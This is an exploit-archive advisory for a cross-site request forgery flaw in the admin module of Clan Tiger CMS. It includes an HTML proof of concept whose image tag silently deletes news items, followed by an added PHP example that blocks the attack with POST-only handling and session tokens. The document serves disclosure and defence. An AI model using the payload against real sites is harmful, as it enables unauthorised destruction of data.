
Clain_TIger_CMS - Cross-Site Request Forgery

Author: pratul agrawal
type: webapps
platform: php
port: 
date_added: 2010-03-16 
date_updated:  
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

=======================================================================

                   Clain_TIger_CMS CSRF Vulnerability

=======================================================================

  # Vulnerability found in- Admin module
  # email         Pratulag@yahoo.com
  # company       aksitservices
  # Credit by     Pratul Agrawal
  # Software      Clan Tiger_CMS
  # Category      CMS / Portals
  # Site p4ge     http://server/clantiger/index.php?module=login
  # Greetz to     Gaurav, Prateek, Vivek, Sanjay, Sourabh, Varun (My Web Team)



  #  Proof of concept   #

  Targeted URL:  http://servername/clantiger/


   Script to Delete the News content through Cross Site request forgery

             .  ................................................................................................................

                        <html>
                          <body>
                              <img src="http://server/clantiger/index.php?module=news&action=remove&id=[user ID]" />
                          </body>
                        </html>

             .  ..................................................................................................................



  After execution, refresh the page and you can see that the added content has been deleted automatically.
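
  A server-side fix for the request shown above, as an added example that is not ClanTiger code or part of the original advisory: the delete action refuses GET and requires a per-session token. The names csrf_token and handle_remove, the csrf_token form field and the in-memory news array are assumptions made for illustration.

```php
<?php
// Added example, not ClanTiger code: function and field names are hypothetical.

// Issue one random token per session; embed it in every state-changing form.
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Decide whether a "remove news" request may proceed.
// Returns an HTTP status: 204 = deleted, 405 = wrong method, 403 = bad token.
function handle_remove(string $method, array $post, array &$session, callable $delete): int
{
    // An <img> tag can only issue GET, so refusing GET for deletes stops that request.
    if ($method !== 'POST') {
        return 405;
    }
    // A cross-site form can still POST, so also require the session-bound token.
    $sent = $post['csrf_token'] ?? '';
    $expected = $session['csrf_token'] ?? '';
    if (!is_string($sent) || $expected === '' || !hash_equals($expected, $sent)) {
        return 403;
    }
    $delete((int) ($post['id'] ?? 0));
    return 204;
}

// Constructed demo: three request shapes against an in-memory news store.
$session = [];
$news = [7 => 'Match report'];
$delete = function (int $id) use (&$news): void { unset($news[$id]); };
$token = csrf_token($session);

// 1. The advisory's image request arrives as GET with no token.
echo handle_remove('GET', [], $session, $delete), "\n";
// 2. A cross-site POST cannot read the admin's token and has to guess.
echo handle_remove('POST', ['id' => '7', 'csrf_token' => 'guess'], $session, $delete), "\n";
// 3. The admin's own form carries the token and the delete goes through.
echo handle_remove('POST', ['id' => '7', 'csrf_token' => $token], $session, $delete), "\n";
// Number of news items left in the store after the three requests.
echo count($news), "\n";
```

  In a real handler the arguments would be $_SERVER['REQUEST_METHOD'], $_POST and $_SESSION; setting the session cookie's SameSite attribute to Lax or Strict adds a second layer.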